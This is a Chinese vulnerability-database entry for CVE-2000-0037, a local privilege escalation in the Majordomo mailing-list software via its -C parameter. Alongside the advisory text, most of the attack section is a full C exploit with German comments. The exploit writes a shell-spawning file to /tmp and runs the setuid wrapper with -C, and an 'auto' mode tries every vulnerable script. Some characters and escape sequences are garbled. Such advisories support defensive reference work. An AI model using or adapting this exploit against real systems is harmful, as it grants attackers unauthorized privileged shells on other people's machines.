Majordomo Local -C参数漏洞
漏洞ID | 1105664 | 漏洞类型 | 输入验证 |
发布时间 | 1999-12-29 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0037 |
CNNVD-ID | CNNVD-199912-094 |
漏洞平台 | Linux | CVSS评分 | 4.6 |
|漏洞来源
|漏洞详情
Majordomo包中存在漏洞,本地用户利用该漏洞通过指定一个备用的配置文件来获得特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/903/info
It is possible for a local user to gain majordomo privileges through a vulnerability which allows privileged arbitrary commands to be executed. If the -C parameter is passed to majordomo (or one of several other scripts) when run with the setuid root wrapper, the argument to -C will be executed with majordomo privileges.
This occurs on several scripts: archive2.pl, bounce-remind, config-test, digest, majordomo, request-answer and resend. medit under bin/, and archive_mh.pl, new-list, and sequencer under Tools/ uses 'require' in the same way, but since the wrapper only executes those scripts found in the majordomo installation directory, they cannot be exploited.
/*
MAJORDOMO - EXPLOIT F�R LINUX
getestet bis v1.94.5
programmiert von Morpheus
Der Exploit basiert auf der fehlerhaften Nutzung von Majordomo-
Skripten. Standardm��ig wird vom Exploit das "bounce-remind"-Skript
verwandt. Bei Erfolg liefert der Exploit eine Shell mit einer uid
und gid dem Majordomo Wrapper entsprechend gesetzt.
Getestet wurde der Exploit auf SuSE Linux 6.0 / 6.3 (CeBIT-Version).
Zur Kompilierung des Exploits:
gcc major.c -o major
Zur Nutzung des Exploits:
Wenn der Exploit <major> hei�t dann einfach ./major eingeben. Es
sollte gen�gen. Wenn dann keine Shell gestartet wird, bitte die
Fehlermeldungen beachten. Entweder ist die Majordomo-Version nicht
"kompatibel" oder das Majordomo-Skript ist nicht vorhanden. Dann
sollte man entweder ./major auto eingeben, so dass der Exploit
alle verwundbaren Skripts ausprobiert, oder man gibt ./major <skript>
ein, wobei <skript> durch ein verwundbares Majordomo-Skript zu ersetzen
ist. Um die Hilfe-�bersicht zu bekommen, einfach ./major -h eingeben.
Programmiert von Morpheus [BrightDarkness] '00
URL: www.brightdarkness.de
Mail: [email protected]
Dieser Bug in Majordomo wurde nicht von mir entdeckt. Ich habe nur
zu diesem Bug den entsprechenden Exploit programmiert.
*/
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#define MAJORDOMO "/usr/lib/majordomo/wrapper"
#define SHELL "system("/bin/sh")"
#define MORPHEUS "/tmp/morpheus"
#define WRAPPER "wrapper"
void intro(void);
void usage(char *arg);
int main(int argc, char **argv)
{
char skript[30];
char *skripte[40];
int i = 0;
int file;
skripte[1] = "bounce-remind";
skripte[2] = "archive2.pl";
skripte[3] = "config-test";
skripte[4] = "digest";
skripte[5] = "majordomo";
skripte[6] = "request-answer";
skripte[7] = "resend";
if ((argc == 2) && (strcmp(argv[1], "-h") == 0))
usage(argv[0]);
if (argc == 2)
strncpy(skript,argv[1], strlen(skript));
else
strcpy(skript, "bounce-remind");
if ((file = open(MORPHEUS, O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0)
{
perror(MORPHEUS);
exit(1);
}
write(file, SHELL, strlen(SHELL));
close(file);
intro();
if (strncmp(skript, "auto") == 0)
{
for (i = 1; i <= 7; i++)
{
printf("using : %sn", skripte[i]);
if (execl(MAJORDOMO, WRAPPER, skripte[i], "-C", MORPHEUS, 0) == -1) perror("EXECL");
}
}
else
{
printf("using : %sn", skript);
if (execl(MAJORDOMO, WRAPPER, skript, "-C", MORPHEUS, 0) == -1) perror("EXECL");
}
return 0;
}
void intro(void)
{
printf(" 33[2J 33[1;1H");
printf(" 33[1;33mExploit-Code f�r Majordomo Wrapper <= v1.94.5n");
printf(" 33[1;32mProgrammiert von Morpheus [BrightDarkness] '00n");
printf(" 33[1;31mURL: 33[1;32mwww.brightdarkness.den");
printf(" 33[1;31mmail: 33[1;[email protected]");
printf(" 33[0;29m");
}
void usage(char *arg)
{
intro();
printf(" 33[1;34m");
printf("Hilfe f�r dieses Programm :n");
printf("Benutzung : %s -h Help screenn", arg);
printf(" %s auto Trying all scripts automaticallyn", arg);
printf(" %s <skriptname> Tries just this <script>n", arg);
printf(" 33[0;29m");
exit(0);
}
|参考资料
来源:BID
名称:903
链接:http://www.securityfocus.com/bid/903
来源:REDHAT
名称:RHSA-2000:005
链接:http://www.redhat.com/support/errata/RHSA-2000-005.html
来源:BUGTRAQ
名称:20000113InfoonsomesecurityholesreportedagainstSCOUnixware.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=94780294009285&w;=2
相关推荐: VolanoChatPro Local Password Disclosure Vulnerability
VolanoChatPro Local Password Disclosure Vulnerability 漏洞ID 1103731 漏洞类型 Design Error 发布时间 2000-11-04 更新时间 2000-11-04 CVE编号 N/A CNN…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666